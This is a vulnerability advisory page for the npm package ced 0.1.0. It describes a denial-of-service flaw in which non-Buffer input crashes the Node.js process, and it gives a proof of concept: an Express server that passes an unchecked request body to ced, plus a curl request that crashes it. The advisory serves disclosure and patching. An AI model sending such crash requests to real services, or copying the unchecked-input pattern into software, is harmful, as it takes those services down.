ced@0.1.0 vulnerabilities

Detect the character encoding using Google’s compact_enc_det library

  • latest version

    2.0.0

  • latest non vulnerable version

  • first published

    6 years ago

  • latest version published

    2 years ago

  • licenses detected

  • Direct Vulnerabilities

    Known vulnerabilities in the ced package. This does not include vulnerabilities belonging to this package’s dependencies.

    Vulnerability: Denial of Service (DoS) (severity: High)

    ced is a library that detects the character encoding of a byte sequence using Google’s compact_enc_det library.

    Affected versions of this package are vulnerable to Denial of Service (DoS). Passing data types other than Buffer causes the Node.js process to crash.

    PoC

    // Express service that forwards the raw request body straight to ced
    const express = require("express");
    const bodyParser = require("body-parser");
    const ced = require("ced");

    const app = express();

    // bodyParser.raw() only parses application/octet-stream by default; for any
    // other Content-Type it leaves req.body as {} rather than a Buffer
    app.use(bodyParser.raw());

    app.post("/", (req, res) => {
      // req.body is never checked, so a non-Buffer value reaches ced and the process crashes
      const encoding = ced(req.body);

      res.end(encoding);
    });

    app.listen(3000);

    Request that triggers the crash (text/plain does not match the raw parser's default type, so req.body is not a Buffer):

    curl --request POST --header "Content-Type: text/plain" --data foo http://localhost:3000

    How to fix Denial of Service (DoS)?

    Upgrade ced to version 1.0.0 or higher.

    Vulnerable versions: <1.0.0